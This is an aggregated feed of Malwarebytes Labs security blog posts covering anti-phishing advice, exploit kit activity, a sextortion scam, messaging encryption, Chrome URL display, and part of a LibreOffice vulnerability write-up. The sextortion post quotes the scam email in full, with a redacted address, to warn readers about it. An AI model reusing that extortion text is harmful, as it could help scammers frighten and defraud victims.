Businesses: phishers aren’t just coming for you. They’re coming for your employees and your customers, too.

Phishing attacks are on the rise this year, thanks in part to massive Emotet and TrickBot campaigns, which make use of phishing emails to deliver their payloads. If you don’t already have one in place, then it’s time to implement an anti-phishing plan.

Where phishes are concerned, it doesn’t matter if the technique being used is revolutionary or old hat. Somebody, somewhere is going to fall for it. It’s up to you and your employees to ensure that your business is secure, and that your customers are performing safe email practices, too.

If your customers are logging into fake portals, eventually they’re going to tie up your support channels asking for help, refunds, reorders, and more. If your employees are being stung, they open the door to data theft, network infiltration, ransom demands, spying, and a massive dent in your company’s reputation to boot.

All of these are poor directions to head in. So let’s first take a look at some of the targets of phishing campaigns. Then, we’ll talk about what your employees and customers can do to identify a phish.

Targets for phishers

The 2018 Phishing Trends & Intelligence Report (PDF) from PhishLabs stated that Email/Online Services were the top targeted industry in the second half of 2017 by a margin of 26.1 percent, with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages.

Office 365 is enormously popular for businesses, with Microsoft revealing in 2016 that is has:

  • 60 million active commercial customers
  • 50,000 small business customers added every month
  • 340 million downloads of its mobile app

As our 2019 State of Malware report shows, there’s no real sector of industry left alone by malware attackers. Trojans (which include Emotet and TrickBot) lured in targets in manufacturing, education, and retail in 2018 with phishing emails. And ransomware, which is also a popular payload of phishing attacks, crippled organizations in government, as well as education, manufacturing, retail.

Outside of those verticals, however, phishers know that every business is sitting on something juicy: personally identifiable information (PII). Just about any organization in any vertical is sitting on databases of customer names, emails, and their payment details.

That’s a huge number of potential targets at which to aim.

What should we do?

While it’s nearly impossible to predict every threat model, or what an attacker may want with your company’s data, you can better thwart phishing attacks by putting in place a clear anti-phishing plan. There’s never been a better time to start beefing up your cybersecurity policy for employees, as well as update your website with solid anti-phishing tips for your customers.

If you’re short of a few ideas on how to help your employees and customers identify phishing attempts, we have a handy introductory list below.

Anti-phishing tips for your employees
  1. Attachments aren’t always a guarantee of malware. Often, phishers will send perfectly clean files as an additional confidence trick. “Please fill this in and send it back,” they’ll say. Having said that, many phish campaigns will happily try to backdoor a network with a rogue file alongside a phish attempt. When in doubt, do not open the file. Instead, try to contact someone you know from the organization listed in the email to confirm.
  2. Mobile devices are particularly at risk from lengthy scam URLs, as the visible portion may be tailored to appear legitimate, but the rest of it—which would give the game away—is hidden offscreen. Employees checking email on their phones or browsing the Internet should always review the whole URL before clicking. If it looks suspicious, or uses numbers or peculiar letters in place of what you’d expect to be there, it’s best to leave immediately.
  3. Dubious apps are also a potential problem, so it’s best to review apps you plan to install on your work mobile device or desktop with a hawk eye. Are the logos the same? Does the user experience match what you’d expect?
  4. Promoted content on social media can lead to phishing, and it’s worth advising all employees and customers to be wary of this—especially as ads tend to be targeted to your interests (thanks, trackers). While you may not want to prohibit use of social media at work entirely (especially as it’s part of the job for many folks in marketing), recommending that users not engage on social media from work devices, or limiting their engagements to work-specific tasks, could help thwart phishing attempts.
  5. Bit of a niche one, but you may wish to advise employees not to waste spammer’s/phisher’s time with any of these tactics during work hours. Using personal accounts is all fun and games, but replying with anything work-related could go terribly wrong. The bad guys know your work mail exists for one thing, and they’ll either spam it hard, send you more junk, or go after your business even more than they were already.
Anti-phishing tips for your customers
  1. Look at some anti-phish pages from the biggest brands. You’ll notice that they all mention the most obvious forms of attack. If you’re eBay, you’re going to see customers sent fake auction missives, or “problem with your auction” attacks. If you’re Steam, it’ll be “problems with your marketplace item” or free game keys. A bank? it’ll be bogus re-authentication mails. For Apple, it’ll be issues with pending refunds for items they don’t remember purchasing. This is how you should lead the charge.
  2. Point out that the presence of a padlock isn’t a guarantee the site they’re on is real. Certificates for websites are easily obtained for free these days, and scammers are taking full advantage of it. It may have been useful to tell people “Avoid sites with no padlock because it isn’t real” years ago, but the game has changed and so must our messaging.
  3. Warn them about bad spelling, errors in formatting, and email addresses in the “From” field which look suspicious. Also mention that many phishers spoof mails in the “From” field so this isn’t a guarantee of safety either. Perhaps the formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. The possibilities are endless.
  4. Desperation is a surefire sign that something may be wrong. It’s panic buying, but not as we know it. Emails claiming a tight time limit to login and perform an action, alongside the threat of losing X or Y forever, is a good sign of bad things afoot.
  5. Warn them off emails asking for additional personal information (and if your organization sends such emails, try to wean yourself off this practice, too). Links to sites asking for logins is bad practice. Train your customers and employees out of this habit. If they won’t click links asking for information, the battle is halfway won.
  6. The URL shown on the email and the URL that displays when you hover over the link are different from one another. An oldie, but goodie.
My business uses Office365, what else can I do?

Microsoft has a handy list of security suggestions for you to deploy on your network. Suggestions include:

And finally

Google has come up with a short, fun, and difficult anti-phishing test. It’s a fantastic way to experience some common phishing techniques safely. There aren’t many ways to experience real phishing examples in a safe environment, so it’s well worth having a go. You’ll likely find that there’s a few tactics in there you haven’t seen before, and it’s always a good idea to test your employees on some left-field phishing techniques. However you choose to go about putting together an anti-phishing plan for your organization, we wish you many years of safe emailing ahead.

The post Businesses: It’s time to implement an anti-phishing plan appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Exploit kits: winter 2019 review

Malware Bytes Security - Tue, 02/12/2019 - 11:00am

Active malvertising campaigns in December and the new year have kept exploit kit activity from hibernating in winter 2019. We mostly observed Fallout and RIG with the occasional, limited GrandSoft appearance for wider geo-targeting.

In addition, narrowly-focused exploit kits such as Magnitude, Underminer, and GreenFlash Sundown stayed on the same track: delivering ransomware to mostly Asian countries, and South Korea in particular.

Winter 2019 overview
  • Fallout EK
  • RIG EK
  • GrandSoft EK
  • Magnitude EK
  • Underminer EK
  • GreenFlash Sundown EK

Internet Explorer’s CVE-2018-8174 and Flash’s CVE-2018-4878 continue to be the most common vulnerabilities across the board, even though a couple exploit kits have now integrated the newer Flash CVE-2018-15982.

Fallout EK

Fallout keeps bringing fresh air into an otherwise stale atmosphere by introducing new features and even adopting newer vulnerabilities. It also appears to be a good experimental framework for some actors who have customized the payload delivery. Fallout was the second exploit kit to add CVE-2018-15982, a more recent vulnerability for the Flash Player.


Good old RIG is still kicking around, but has taken a back seat to the newer Fallout in many of the malvertising chains we track, except perhaps for Fobos. There haven’t been any notable changes to report since we last reviewed it.

GrandSoft EK

GrandSoft and its Ramnit payload still go hand-in-hand via limited distribution tied to compromised websites. It is perhaps one of the least sophisticated exploit kits on the market right now.

Magnitude EK

Meanwhile, Magnitude EK is active and served up via malvertising chains, with a focus on some APAC countries like South Korea. Magnitude continues to deliver its fileless Magniber ransomware payload.

Underminer EK

Underminer’s over-the-top encryption schemes to hide its exploits are keeping us researchers honest when trying to identify exactly what is under the hood. It’s worth noting that only a few days after the Flash zero-day and Proof of Concept (PoC) had been published (CVE-2018-15982), Underminer was already implementing it.

GreenFlash Sundown EK

Also a geo-specific exploit kit, GreenFlash Sundown has been delivering various breeds of ransomware to targets in Asia. In our latest capture, we saw it drop the Seon ransomware on South Korean users.


While timely patching and avoidance of Internet Explorer as a web browser would offer protection against the above-mentioned exploit kits, the reality is that many users (especially in corporate environments) are still trailing behind. In addition, while IE is being phased out in North America, it’s still highly adopted in Asian countries—which explains why they are currently being targeted.

Malwarebytes’ anti-exploit technology blocks each of these exploit kits—Fallout, RIG, GrandSoft, Magnitude, Underminer, and GreenFlash Sundown—before they even have a chance to drop their payload.

As we move further into 2019, we can say that exploit kits, while nowhere near their peak activity in 2017, are still hanging on, being used primarily in malvertising distribution campaigns. In terms of global activity, Fallout is leading the charge, providing the most diverse campaigns and payloads. Meanwhile, the Asia-specific EKs are for the most part continuing on with their usual pattern of driving innovation (to a degree) and distributing ransomware.

The post Exploit kits: winter 2019 review appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Sextortion Bitcoin scam makes unwelcome return

Malware Bytes Security - Mon, 02/11/2019 - 1:38pm

Heads up: a particularly nasty sextortion Bitcoin scam from at least the middle of 2018 is making the rounds once again.

The scam involves making use of old breach dumps, then emailing someone from the list and reminding them of their old password.

When something lands in your mailbox with “Hey, remember this?” it’s a surefire way to focus the reader’s attention. Pressure is then applied to start sending over some Bitcoin…or else.

What is the threat being made?

The generally accepted theory is that the scammer digs up personally identifiable information from old data breaches, including email addresses and passwords, plugs it into some sort of automated script, and then fires out thousands of emails.

Those mails reach people from said breach, and they then see talk of somebody “knowing” their login details. That’s then used as leverage to claim the attacker has access to their PC, files, folders, webcams, browsing history—in a nutshell, anything personal and sensitive. The scarier they can make it sound, the better. In fact, one of the more eye-popping claims is that the scammer has video of the user viewing adult websites, and they will share this video with all the user’s contacts unless they pony up and pay a Bitcoin ransom.

And in classic ransomware fashion, there’s typically a ticking clock. Giving users a short time limit to deliver the payment is social engineering at its finest.

What next?

The recipient may well have a panic attack, that’s what. To be suddenly confronted with an ancient (but potentially still active) password is certainly going to give a bit of a shock to the system. It’s at this point the confusion sets in, as they start to wonder what on Earth the attacker has. Did they really see what they claimed to see? Do they actually have video footage? What other potentially embarrassing (or worse) content could they use to extort and blackmail?

What do they really have?

A large throne of lies, is what.

Yes, they have your password from a long time ago.

No, they do not have access to your computer. And no, even if you were checking out adult sites, they don’t have video of you doing so.

What they might have is access to your email account associated with the breach, if you haven’t changed the password since it took place. They could also potentially start trying to log into other accounts you have with the same password. If this is the case, you should fire up a password manager and get to work changing things.

In fact, you should do that if you share passwords across accounts in any case.

Okay, back to the scam.

What does the email say?

It’s a fairly standard template, and hunting for portions of the below mail will throw up any number of hits in Google and other search engines.

Click to enlarge

The email reads as follows:

I am well aware [REDACTED] is your pass words. Lets get right to point. Neither anyone has paid me to investigate you. You may not know me and you are probably thinking why you’re getting this e-mail? 

actually, i installed a software on the adult videos (pornographic material) web-site and do you know what, you visited this website to have fun (you know what i mean). While you were viewing videos, your web browser began working as a Remote Desktop that has a keylogger which gave me accessibility to your display and also cam. Just after that, my software gathered every one of your contacts from your Messenger, Facebook, as well as email . after that i created a double video. 1st part displays the video you were viewing (you’ve got a nice taste haha), and next part shows the recording of your cam, yeah its you. 

You have not one but two choices. Shall we read up on these options in aspects: 

First alternative is to just ignore this message. in such a case, i am going to send out your actual video to every single one of your personal contacts and think regarding the awkwardness you will definitely get. and definitely if you happen to be in a loving relationship, how it would affect? 

Number 2 solution is to pay me $889. Lets name it as a donation. in this situation, i most certainly will asap remove your video footage. You could carry on daily life like this never occurred and you surely will never hear back again from me.

You’ll make the payment through Bi‌tco‌in (if you don’t know this, search for ‘how to buy b‌itcoi‌n’ in Google). 

B‌T‌C‌ ad‌dre‌ss to send to: [REDACTED]

[CaSe sensitive, copy & paste it] 

if you are wondering about going to the law enforcement officials, well, this message can not be traced back to me. I have dealt with my actions. i am also not attempting to demand a huge amount, i would like to be compensated. within this%} emaiQUNdkpeC [SIC] if i do not receive the ‌bi‌tco‌in‌, i will send your video recording to all of your contacts including family members, coworkers, and so forth. Having said that, if i receive the payment, i will erase the recording immediately. If you really want proof, reply Yup then i will send out your video to your 9 friends. This is a non-negotiable offer, so don’t waste mine time and yours by replying to this e mail.

That’s pretty sneaky

It is, and I’d be surprised if there aren’t many others waking up to emails identical to the above. Should you receive one yourself, do the following:

  1. Don’t panic. They absolutely do not have the keys to your computer.
  2. See if the email in question pops up over on Haveibeenpwned.
  3. See if your password does the same thing.
  4. At this point, you may have a fairly good idea which breach they grabbed your old login from, which is always useful information to have.
  5. Delete the email you were sent, and under no circumstances pay them a penny/dime/insert currency of choice here.
Scare tactics: an evil practice

The anonymous sender of these mails doesn’t care about the trauma they could cause at the other end. These missives would be particularly traumatic for anyone involved in (say) a revenge porn case previously. And make no mistake, generic Internet blackmail threats can kill.

If you’re able to report these mails for spam/abuse before deleting, do so. There’s a remote chance you could actually save someone’s life while making the Internet a little safer into the bargain.

The post Sextortion Bitcoin scam makes unwelcome return appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (February 4 – 8)

Malware Bytes Security - Mon, 02/11/2019 - 12:05pm

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Compromising vital infrastructure: communication

Malware Bytes Security - Fri, 02/08/2019 - 2:09pm

Have you ever been witness to a Wi-Fi failure in a household with school-aged children? If so, I don’t have to convince you that communication qualifies as vital infrastructure. For the doubters: when you see people risking their lives in traffic just to check their phone, you’ll understand why most adults consider instant communication to be vital as well.

Forms of communication

Humanity has come a long way in communication techniques. From drawings on the cave wall to wartime messages sent via courier to the Pony Express and now, the Internet. Modern communication tools enable us to reach most places across the world in a matter of seconds.

What are the lines of communications that are more or less vital to our everyday life?

  • The Internet
  • Telephone lines
  • Mobile telephone networks
  • TV and radio broadcasting

Granted, if one of these communication forms fails, part of its traffic can be taken over by another form, but they all have their specific pros and cons that make a durational outage hard to cope with. For example, most smartphones are capable of using both the mobile networks and the Internet, but the latter is limited to when they have Wi-Fi access. When cell phone towers go down, as they did during 9/11, users could send messages via Internet messaging services—at that time, AIM, but today WhatsApp, Facebook Messenger, or other platforms.

Growing importance

In the list I posted earlier, you may have felt that I missed out on letters and postcards, or snail-mail as we often call it. This is because a growing number of companies are keeping us informed through email, their websites, text messages, and other forms of communication that are way faster than postal services. Most companies will still send letters and paper bills if you ask for them, but it’s no longer the default. Our mail delivery services are increasingly starting to resemble package delivery services. They see a growing number of deliveries that require a physical transfer of an object rather than information alone.

Instead, the majority of modern communication is digital.

Securing digital communication

Digital information that needs to be kept from prying eyes and eavesdropping is usually encrypted. To establish secure communication, one may use encrypted mail, crypto-phones, and secure protocols on the Internet. Most of these encryptions are strong enough to withstand brute force attempts at entry—at least for long enough to outlive the usefulness of intercepting the message. Future computer systems like qubit quantum computers, however, may require us to upgrade the encryption strength that we use for these methods.

Breaking the Internet

Because of the way the Internet has grown and become more versatile, the Internet backbone is robust enough to withstand DDoS attacks of a large magnitude. Yet, there have been instances where an entire country, such as North Korea, was taken offline, or where an attack on a major DNS provider caused a serious disruption in the number of sites we were able to visit.

These attacks were targeted at systems that were important for specific parts of the Internet. Nevertheless, they demonstrated that there are weaknesses in the infrastructure that can be exploited to paralyze parts of the Internet, and therefore, parts of our vital communication.

Misinformation and fake news

Another growing problem with predominantly online communication is the spreading of fake news and deliberate misinformation. The most common reasons for spreading misinformation are political and financial gain, as well as attention. The problem has reached a size and impact that caused government bodies like the EU to announce countermeasures. During that process, and due to other influences social media has over its users, many organizations felt the need to hired hordes of moderators who are tasked with keeping the information spread on their platforms as clean and as honest as possible. This still fell short in some instances, such as the dramatic events in Myanmar where Facebook was used as a tool for ethnic cleansing. And these are not the only problems social media are trying to deal with.

Malware and communication

Communication is also a vital part of some types of malware, such as backdoors, Trojans, and especially spyware. After all, what use is it to spy on someone if you are unable to get your hands on the gathered information? Traditional malware communication relies on the use of Command and Control (C&C) servers. But since those servers can be taken down or blocked, malware authors have been looking at rotation systems like Domain Generating Algorithms and some other creative ideas, like using social media and other public platforms.

While you may use social media to stay in contact with family and friends, there are many forms of malware that use those same media for different purposes. Botnets are known to use Twitter as an outlet for spam, fraud, and fake news. But they also use it to send commands to Remote Access Trojans (RATs) that wait for code hidden in memes posted by a particular account.

In addition, malware exploits messenger platforms to communicate instructions. There’s the Goodsender malware, for which threat actors used the Telegram messenger platform to communicate with the malware and send HTTPS-protected instructions. Another well-known phenomenon are the Facebook Messenger apps that spread in a worm-like fashion by sending out links to friends in an attempt to trick users into being installed.

Social media countermeasures

While social media is struggling with its public reputation these days, they at least seem ready to take baby steps forward in tightening up security—whether that’s from political pressure or self-awareness. At an event in Brussels, Nick Clegg, Facebook’s head of global public relations, stated:

We are at the start of a discussion which is no longer about whether social media should be regulated, but how it should be regulated. We recognize the value of regulation, and we are committed to working with policymakers to get it right.

Working out the “how” could turn into a long-winded discussion, however. Maybe the rumors about a space laser communications system represent a step in the right direction. In theory, such a system could be used to improve security.

Better communication results in better security

Having all the facts helps us to improve security. Making sure that this information reaches the people that need it is a matter of effective communication strategy. And in some cases, it may be just as important that the information is not communicated so that it doesn’t fall into the wrong hands.

The National Intelligence Strategy released in January 2019 by the Office of the Director of National Intelligence states:

Nearly all information, communication networks, and systems will be at risk for years to come.

Therefore, an important part of communication strategy must be to recognize the risk and integrate the proper tools—such as end-to-end encryption or intel on certain platforms known to be used by cybercriminals, for example. The National Intelligence Strategy goes on to say that they’ll be “harnessing the full talent and tools of the IC [Intelligence Community] by bringing the right information, to the right people, at the right time.”

Cyberattacks on communication infrastructure

A pretty bizarre method of abusing communication happened when a family was scared into believing there was an ongoing nuclear attack, as some prankster accessed their Nest camera to issue realistic warnings about missiles heading to the US from North Korea.

More worrying is the trend for ransomware authors (especially groups using SamSam) to aim their targets at cities and small government bodies with the aim of shutting down infrastructure, including communications. Taking down a city website, as was the case in the city of Atlanta, cripples an important medium of disseminating citizen information, not to mention that the costs related to getting everything back online were absorbed with taxpayer money that could have been better spent on other services.

Information is crucial

Important decisions may be postponed when the person or body that is supposed to make that decision is unable to gather the information necessary. Communications are also a vital part of some malware infections. Perhaps organizations can use some of the ingenious methods malware authors have thought up when looking for ways to make vital lines of communication more robust. Redundancy is a good thing when it allows us to use multiple methods and networks to transmit the same information. On the other hand, it also enlarges the attack surface when it comes to sharing confidential information.

This does have an upside for the quality of free information. Because of all the communication options out there, some regimes are having an increasingly difficult time shielding their population from information they would rather keep under the carpet. This hasn’t stopped some, like China’s Great Firewall, from trying, though.

Communication is everywhere

Communication is truly always available to nearly everyone that wants it in the western world, and this readiness—and the danger that lurks with it—may shape how our generation is viewed far into the future. This may be the era when communication both flourished to its true potential, and reached its limits. After all, pitfalls are inherent when technology develops faster than regulation can keep up.

Maybe the developments we are seeing now are just another step forward for the eventual better regulation of communication, though I’m convinced it will not be the last step regulators need to take. In fact, 5G is already waiting around the corner to add another level in speed and bandwidth to an already connected society. Let’s see how this new technology impacts an already complex tapestry of communication triumphs and failures.

The post Compromising vital infrastructure: communication appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle

Malware Bytes Security - Thu, 02/07/2019 - 11:53am

Secure messaging is supposed to be just that—secure. That means no backdoors, strong encryption, private messages staying private, and, for some users, the ability to securely communicate without giving up tons of personal data.

So, when news broke that scandal-ridden, online privacy pariah Facebook would expand secure messaging across its Messenger, WhatsApp, and Instagram apps, a broad community of cryptographers, lawmakers, and users asked: Wait, what?

Not only is the technology difficult to implement, the company implementing it has a poor track record with both user privacy and online security.

On January 25, the New York Times reported that Facebook CEO Mark Zuckerberg had begun plans to integrate the company’s three messaging platforms into one service, allowing users to potentially communicate with one another across its separate mobile apps. According to the New York Times, Zuckerberg “ordered that the apps all incorporate end-to-end encryption.”

The initial response was harsh.

Abroad, Ireland’s Data Protection Commission, which regulates Facebook in the European Union, immediately asked for an “urgent briefing” from the company, warning that previous data-sharing proposals raised “significant data protection concerns.”

In the United States, Democratic Senator Ed Markey for Massachusetts said in a statement: “We cannot allow platform integration to become privacy disintegration.”

Cybersecurity technologists swayed between cautious optimism and just plain caution.

Some professionals focused on the clear benefits of enabling end-to-end encryption across Facebook’s messaging platforms, emphasizing that any end-to-end encryption is better than none.

Former Facebook software engineer Alec Muffet, who led the team that added end-to-end encryption to Facebook Messenger, said on Twitter that the integration plan “clearly maximises the privacy afforded to the greatest [number] of people and is a good idea.”

Others questioned Facebook’s motives and reputation, scrutinizing the company’s established business model of hoovering up mass quantities of user data to deliver targeted ads.

John Hopkins University Associate Professor and cryptographer Matthew Green said on Twitter that “this move could potentially be good or bad for security/privacy. But given recent history and financial motivations of Facebook, I wouldn’t bet my lunch money on ‘good.’”

On January 30, Zuckerberg confirmed the integration plan during a quarterly earnings call. The company hopes to complete the project either this year or in early 2020.

It’s going to be an uphill battle.

Three applications, one bad reputation

Merging three separate messaging apps is easier said than done.

In a phone interview, Green said Facebook’s immediate technological hurdle will be integrating “three different systems—one that doesn’t have any end-to-end encryption, one where it’s default, and one with an optional feature.”

Currently, the messaging services across WhatsApp, Facebook Messenger, and Instagram have varying degrees of end-to-end encryption. WhatsApp provides default end-to-end encryption, whereas Facebook Messenger provides optional end-to-end encryption if users turn on “Secret Conversations.” Instagram provides no end-to-end encryption in its messaging service.

Further, Facebook Messenger, WhatsApp, and Instagram all have separate features—like Facebook Messenger’s ability to support more than one device and WhatsApp’s support for group conversations—along with separate desktop or web clients.

Green said to imagine someone using Facebook Messenger’s web client—which doesn’t currently support end-to-end encryption—starting a conversation with a WhatsApp user, where encryption is set by default. These lapses in default encryption, Green said, could create vulnerabilities. The challenge is in pulling together all those systems with all those variables.

“First, Facebook will have to likely make one platform, then move all those different systems into one somewhat compatible system, which, as far as I can tell, would include centralizing key servers, using the same protocol, and a bunch of technical development that has to happen,” Green said. “It’s not impossible. Just hard.”

But there’s more to Facebook’s success than the technical know-how of its engineers. There’s also its reputation, which, as of late, portrays the company as a modern-day data baron, faceplanting into privacy failure after privacy failure.

After the 2016 US presidential election, Facebook refused to call the surreptitious collection of 50 million users’ personal information a “breach.” When brought before Congress to testify about his company’s role in a potential international disinformation campaign, Zuckerberg deflected difficult questions and repeatedly claimed the company does not “sell” user data to advertisers. But less than one year later, a British parliamentary committee released documents that showed how Facebook gave some companies, including Airbnb and Netflix, access to its platform in exchange for favors—no selling required.

Five months ago, Facebook’s Onavo app was booted from the Apple App Store for gathering app data, and early this year, Facebook reportedly paid users as young as 13-years-old to install the “Facebook Research” app on their own devices, an app intended strictly for Facebook employee use. Facebook pulled the app, but Apple had extra repercussions in mind: It removed Facebook’s enterprise certificate, which the company relied on to run its internal developer apps.

These repeated privacy failures are enough for some users to avoid Facebook’s end-to-end encryption experiment entirely.

“If you don’t trust Facebook, the place to worry is not about them screwing up the encryption,” Green said. “They want to know who’s talking to who and when. Encryption doesn’t protect that at all.”

If not Facebook, then who?

Reputationally, there are at least two companies that users look to for both strong end-to-end encryption and strong support of user privacy and security—Apple and Signal, which respectively run the iMessage and Signal Messenger apps.

In 2013, Open Whisper Systems developed the Signal Protocol. This encryption protocol provides end-to-end encryption for voice calls, video calls, and instant messaging, and is implemented by WhatsApp, Facebook Messenger, Google’s Allo, and Microsoft’s Skype to varying degrees. Journalists, privacy advocates, cryptographers, and cybersecurity researchers routinely praise Signal Messenger, the Signal Protocol, and Open Whisper Systems.

“Use anything by Open Whisper Systems,” said former NSA defense contractor and government whistleblower Edward Snowden.

“[Signal is] my first choice for an encrypted conversation,” said cybersecurity researcher and digital privacy advocate Bruce Schneier.

Separately, Apple has proved its commitment to user privacy and security through statements made by company executives, updates pushed to fix vulnerabilities, and legal action taken in US courts.

In 2016, Apple fought back against a government request that the company design an operating system capable of allowing the FBI to crack an individual iPhone. Such an exploit, Apple argued, would be too dangerous to create. Earlier last year, when an American startup began selling iPhone-cracking devices—called GrayKey—Apple fixed the vulnerability through an iOS update.

Repeatedly, Apple CEO Tim Cook has supported user security and privacy, saying in 2015: “We believe that people have a fundamental right to privacy. The American people demand it, the constitution demands it, morality demands it.”

But even with these sterling reputations, the truth is, cybersecurity is hard to get right.

Last year, cybersecurity researchers found a critical vulnerability in Signal’s desktop app that allowed threat actors to obtain users’ plaintext messages. Signal’s developers fixed the vulnerability within a reported five hours.

Last week, Apple’s FaceTime app, which encrypts video calls between users, suffered a privacy bug that allowed threat actors to briefly spy on victims. Apple fixed the bug after news of the vulnerability spread.

In fact, several secure messaging apps, including Telegram, Viber, Confide, Allo, and WhatsApp have all reportedly experienced security vulnerabilities, while several others, including Wire, have previously drawn ire because of data storage practices.

But vulnerabilities should not scare people from using end-to-end encryption altogether. On the contrary, they should spur people into finding the right end-to-end encrypted messaging app for themselves.

No one-size-fits-all, and that’s okay

There is no such thing as a perfect, one-size-fits-all secure messaging app, said Electronic Frontier Foundation Associate Director of Research Gennie Gebhart, because there’s no such thing as a perfect, one-size-fits-all definition of secure.

“In practice, for some people, secure means the government cannot intercept their messages,” Gebhart said. “For others, secure means a partner in their physical space can’t grab their device and read their messages. Those are two completely different tasks for one app to accomplish.”

In choosing the right secure messaging app for themselves, Gebhart said people should ask what they need and what they want. Are they worried about governments or service providers intercepting their messages? Are they worried about people in their physical environment gaining access to their messages? Are they worried about giving up their phone number and losing some anonymity?

In addition, it’s worth asking: What are the risks of an accident, like, say, mistakenly sending an unencrypted message that should have been encrypted? And, of course, what app are friends and family using?

As for the constant news of vulnerabilities in secure messaging apps, Gebhart advised not to overreact. The good news is, if you’re reading about a vulnerability in a secure messaging tool, then the people building that tool know about the vulnerability, too. (Indeed, developers fixed the majority of the security vulnerabilities listed above.) The best advice in that situation, Gebhart said, is to update your software.

“That’s number one,” Gebhart said, explaining that, though this line of defense is “tedious and maybe boring,” sometimes boring advice just works. “Brush your teeth, lock your door, update your software.”

Cybersecurity is many things. It’s difficult, it’s complex, and it’s a team sport. That team includes you, the user. Before you use a messenger service, or go online at all, remember to follow the boring advice. You’ll better secure yourself and your privacy.

The post Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Google Chrome announces plans to improve URL display, website identity

Malware Bytes Security - Wed, 02/06/2019 - 1:16pm

“Unreadable gobbledygook” is one way to describe URLs today as we know them, and Google has been attempting to redo their look for years. In their latest move to improve how Chrome—and of course, how the company hopes other browsers would follow suit—displays the URL in its omnibox (the address bar), Google’s Chrome team has made public two projects that usher them in this direction.

First, they launched Trickuri (pronounced as “trickery”) in time for a talk they were scheduled to present at the 2019 Enigma Conference. Second, they’re working on creating warnings of potentially phishy URLs for Chrome users.

Watch out! Some trickery and phishing ahead

Trickuri is an open-source tool where developers can test whether their applications display URLs accurately and consistently in different scenarios. The new Chrome warnings, on the other hand, are still in internal testing. Emily Stark, Google Chrome’s Usability Security Lead, confesses that the challenge lies in creating heuristic rules that appropriately flag malicious URLs while avoiding false positives.

“Our heuristics for detecting misleading URLs involve comparing characters that look similar to each other and domains that vary from each other just by a small number of characters,” Stark said in an interview with WIRED. “Our goal is to develop a set of heuristics that pushes attackers away from extremely misleading URLs, and a key challenge is to avoid flagging legitimate domains as suspicious. This is why we’re launching this warning slowly, as an experiment.”

These efforts are part of the team’s current focus, which is the detection and flagging of seemingly dubious URLs.

Google Chrome’s bigger goal

The URL is used to identify entities online. It is the first place users look to assess if they are in a good place or not. But not everyone knows the components that comprise a URL, much less what they mean in the syntax. Google’s push for website owners to use HTTPS has rippled across browser developers and consequently changed user preferences to favor such sites. In effect, by pushing HTTPS, Google changed the game to give the user a generally safer online experience.

However, Google wants to go beyond this, and are set on raising user awareness of relevant parts of the URL (so they can make quick security decisions). As a result, they are refining Chrome to present these parts while keeping users’ view away from the irrelevant gibberish.

In a separate interview with WIRED, Adrienne Porter Felt, Google Chrome’s Engineering Manager, has this to say about how users perceive the URL: “People have a really hard time understanding URLs. They’re hard to read, it’s hard to know which part of them is supposed to be trusted, and in general I don’t think URLs are working as a good way to convey site identity. So we want to move toward a place where web identity is understandable by everyone—they know who they’re talking to when they’re using a website and they can reason about whether they can trust them. But this will mean big changes in how and when Chrome displays URLs. We want to challenge how URLs should be displayed and question it, as we’re figuring out the right way to convey identity.”

While these may all sound good, no one—not even Google—knows what the final, new URL will look like at this point.

A brief timeline of Google’s efforts in changing the URL

Below is a brief timeline of attempts Google has made to how Chrome displays the URL in the omnibox:

“…it just raises too many questions.”

With Google’s new effort, how will it affect redirection schemes? SEO? Shortened URLs?

Will this, in time, affect the behavior of new Internet users entering URLs in the address bar? For example, what if they don’t know that certain URL elements are (by default) elided but should now be typed in (such as entering ‘www’) to go to their desired destination? Will they understand the meaning of .com or .org if these elements are erased from view?

How can web developers, business owners, and consumers prepare themselves for these URL changes?

Right now, there’s more uncertainty than there are answers, as Google admits there is still a lot of work to be done. And based on the tone of several spokespersons in interviews, the company also expects some pushback and a degree of controversy that may arise from their efforts. Change is never easy.

Let’s keep an eye on this URLephant in the room, shall we? And let’s also keep giving feedback and raising questions. After all, this is Google’s way of keeping Chrome users away from URL-based threats. If changes are not implemented with thoughtful precision, then threat actors can easily find a way around them, or at least bank on the confusion resulting from a poor rollout of new processes.

While the future of URLs is still murky, one thing’s for certain: the bad guys know how to exploit weaknesses. So we hope, for Google and all its users’ sake, changes in URL display only serve to strengthen everyone’s security posture online.

Further reading:


The post Google Chrome announces plans to improve URL display, website identity appeared first on Malwarebytes Labs.

Categories: Malware Bytes

New critical vulnerability in open-source office suites

Malware Bytes Security - Wed, 02/06/2019 - 12:16pm

A great number of attack techniques these days are using Microsoft Office documents to distribute malware. In recent years, there has been serious development on document exploit kit builders, not to mention the myriad of tricks that red-teamers have come up with to bypass security solutions.

In contrast to drive-by downloads that require no user interaction, document-based attacks usually incorporate some kind of social engineering component. From being lured into opening up an attachment to enabling the infamous macros, attackers are using all sorts of themes and spear phishing techniques to infect their victims.

While Microsoft Office gets all of the attention, other productivity software suites have been exploited before. We recall the Hangul Office Suite, which is popular in South Korea and was used by threat groups in targeted attacks.

Today we look at a vulnerability in LibreOffice, the free and open-source office suite, and OpenOffice (now Apache OpenOffice) available for Windows, Mac, and Linux. The bug (CVE-2018-16858) was discovered by Alex Inführ, who responsibly disclosed it and then published the results with an accompanying proof of concept on his blog.

Proof of concept code exploiting the vulnerability and launching the calculator

An attacker could take advantage of this bug to execute remote code, which could lead to compromising the system. The flaw uses a mouseover event, which means the user would have to be tricked into placing their mouse over a link within the document. This triggers execution of a Python file (installed with LibreOffice) and allows parameters to be passed and executed.

